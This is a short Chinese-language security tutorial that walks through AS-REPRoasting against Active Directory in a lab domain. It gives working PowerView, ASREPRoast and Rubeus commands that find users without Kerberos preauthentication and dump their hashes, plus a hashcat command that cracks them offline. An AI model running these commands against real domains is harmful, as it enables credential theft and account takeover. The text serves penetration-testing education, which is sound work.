安全技术 | 域渗透AS-REPRoasting

域用户在配置了”Do not require Kerberos preauthentication(不需要kerberos预身份验证) "属性时，则该用户在进行Kerberos身份验证时就不需要进行第一步(AS_REQ & AS_REP)的预身份验证。

使用该用户请求票据时，域控不会作任何验证就将 TGT票据 和 该用户Hash加密的Session Key返回。因此，攻击者就可以对获取到的 用户Hash加密的Session Key进行离线破解，如果破解成功，就能得到该指定用户的密码明文。

本文由锦行科技的安全研究团队提供，旨在从攻击者的视角还原AS-REPRoasting的渗透过程。

1、利用场景: 

攻击者拿到一台能与域控通信的主机用户：win10

目标：开启了不需要kerberos预身份验证的域用户：test1

域：test.com

域控：192.168.18.137

2、寻找满足条件的用户: 

Powerview：

Import-Module .\PowerView.ps1

Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose

3、导出hash：

powershell:

Import-Module .\ASREPRoast.ps1

Invoke-ASREPRoast -Verbose |fl

导出指定用户hash ，可在域外使用

Import-Module .\ASREPRoast.ps1

 Get-ASREPHash -UserName test1 -Domain test.com -Server 192.168.18.137

Rubeus：

Rubeus.exe asreproast

4、破解hash：

使用hashcat破解

把hash写入到hash.txt并拼接成hashcat能够识别的格式，在$krb5asrep后面添加$23

hashcat -m 18200 hash.txt pass.txt --force

破解密码为：1qazxsw#